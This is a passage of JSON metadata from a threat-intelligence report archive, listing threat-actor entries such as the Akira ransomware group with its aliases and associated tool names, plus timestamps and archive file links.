				"GOLD SAHARA"
			],
			"source_name": "MISPGALAXY:Storm-1567",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "910b38e9-07fe-4b47-9cf4-e190a07b1b84",
			"created_at": "2024-04-24T02:00:49.516358Z",
			"updated_at": "2026-04-10T02:00:05.309426Z",
			"deleted_at": null,
			"main_name": "Akira",
			"aliases": [
				"Akira",
				"GOLD SAHARA",
				"PUNK SPIDER",
				"Howling Scorpius"
			],
			"source_name": "MITRE:Akira",
			"tools": [
				"Mimikatz",
				"PsExec",
				"AdFind",
				"Akira _v2",
				"Akira",
				"Megazord",
				"LaZagne",
				"Rclone"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "256a6a2d-e8a2-4497-b399-628a7fad4b3e",
			"created_at": "2023-11-30T02:00:07.299845Z",
			"updated_at": "2026-04-10T02:00:03.484788Z",
			"deleted_at": null,
			"main_name": "WildCard",
			"aliases": [],
			"source_name": "MISPGALAXY:WildCard",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434949,
	"ts_updated_at": 1775792121,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/e97036fb6e296b37cf303f1b8310a41ca92dd59d.pdf",
		"text": "https://archive.orkl.eu/e97036fb6e296b37cf303f1b8310a41ca92dd59d.txt",
		"img": "https://archive.orkl.eu/e97036fb6e296b37cf303f1b8310a41ca92dd59d.jpg"
	}
}